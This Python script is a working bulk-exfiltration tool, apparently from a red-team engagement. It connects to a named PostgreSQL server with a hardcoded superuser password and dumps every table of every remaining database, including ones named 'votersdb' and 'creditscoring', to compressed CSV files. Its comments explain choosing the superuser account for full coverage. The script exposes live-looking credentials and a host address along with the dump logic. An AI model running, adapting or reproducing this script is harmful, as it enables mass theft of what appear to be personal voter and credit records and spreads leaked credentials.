#!/usr/bin/env python3
"""snwolley PG remaining-DBs dump (engagement one-off).

Resumes exfil_all's PG work (bdr_unified/votersdb/tottot_npontu/snwolley_alpha/
creditscoring already done). Does NOT touch hellio MySQL (exfil_hellio owns that,
already complete — avoids 2x duplication that bloated exfil_all).
Skips 0-table DBs quietly. Per-table checkpoint + gz.
"""
import json, subprocess, gzip, hashlib, time, os
from pathlib import Path

ROOT = Path('/root/ir-assessment/redteam/gitlab_npontutechnologies_com')
OUT = ROOT / 'exfil_all'
LOG = ROOT / 'exfil_all.log'
# kafkauser = superuser on the snwolley instance (reads ALL 40 DBs).
# rep_listener only has SELECT on 4 DBs — using it returned 0 tables elsewhere
# (silent empty dumps). Superuser is required for full-estate coverage.
PG_PW = '0ArunW82jf$j0!ksh#ksP2eQ'
HOST, PORT, USER = '65.109.51.221', '5542', 'kafkauser'

DONE_DBS = {'bdr_unified','votersdb','tottot_npontu','snwolley_alpha','creditscoring'}

def pg(db, sql, timeout=1800):
    return subprocess.run(['psql','-h',HOST,'-p',PORT,'-U',USER,'-d',db,'-At','--no-psqlrc','-c',sql],
                          capture_output=True, timeout=timeout,
                          env={'PGPASSWORD':PG_PW,'PGCONNECT_TIMEOUT':'20','PATH':'/usr/bin:/bin'})

def tables(db):
    r = pg(db, "SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE';", 120)
    return [t for t in r.stdout.decode('utf-8','replace').splitlines() if t.strip()]

def stream_table(db, table):
    d = OUT / f'pg_{db}'; d.mkdir(parents=True, exist_ok=True)
    ck = d / f'.{table}.done'
    if ck.exists(): return
    p = d / f'{table}.csv.gz'
    sql = f'COPY (SELECT * FROM "{table}") TO STDOUT WITH CSV HEADER;'
    h = hashlib.sha256(); total = 0
    proc = subprocess.Popen(['psql','-h',HOST,'-p',PORT,'-U',USER,'-d',db,'--no-psqlrc','-c',sql],
                            stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                            env={'PGPASSWORD':PG_PW,'PGCONNECT_TIMEOUT':'20','PATH':'/usr/bin:/bin'})
    tmp = str(p) + '.tmp'
    with open(tmp,'wb') as raw_f:
        with gzip.GzipFile(fileobj=raw_f, mode='wb') as gz:
            while True:
                buf = proc.stdout.read(1 << 20)
                if not buf: break
                gz.write(buf); h.update(buf); total += len(buf)
    proc.wait()
    if proc.returncode != 0 or total == 0:
        try: os.remove(tmp)
        except OSError: pass
        if total == 0:
            ck.write_text('empty')  # 0-row table is a valid complete state
            print(f'  [empty] {db}.{table}', flush=True)
        else:
            print(f'  [FAIL] {db}.{table}', flush=True); LOG.open('a').write(f'FAIL {db}.{table}\n')
        return
    os.replace(tmp, str(p))
    ck.write_text(h.hexdigest())
    print(f'  [ok] {db}.{table}: {total}b', flush=True)

def main():
    LOG.open('a').write(f'=== snwolley resume {time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime())} ===\n')
    r = pg('postgres', "SELECT datname FROM pg_database WHERE datistemplate=false AND has_database_privilege(datname,'CONNECT') ORDER BY pg_database_size(datname) DESC;", 120)
    dbs = [d for d in r.stdout.decode('utf-8','replace').splitlines() if d.strip()]
    print(f'[*] total DBs: {len(dbs)}, skipping done: {len(DONE_DBS)}')
    for db in dbs:
        if db in DONE_DBS:
            print(f'[skip-done] {db}'); continue
        d = OUT / f'pg_{db}'
        if (d / '.db_complete').exists():
            print(f'[skip-marker] {db}'); continue
        try:
            ts = tables(db)
        except Exception as e:
            print(f'[FAIL-list] {db}: {e}'); continue
        print(f'[db] {db}: {len(ts)} tables', flush=True)
        LOG.open('a').write(f'[db] {db}: {len(ts)} tables\n')
        for t in ts:
            try:
                stream_table(db, t)
            except Exception as e:
                print(f'  [EXC] {db}.{t}: {e}', flush=True); LOG.open('a').write(f'EXC {db}.{t}: {e}\n')
        d.mkdir(parents=True, exist_ok=True)  # 0-table DBs never made the dir
        (d / '.db_complete').write_text('done')
        print(f'[+] {db} complete', flush=True)
    print('[+] SNWOLLEY RESUME COMPLETE')

if __name__ == '__main__':
    main()
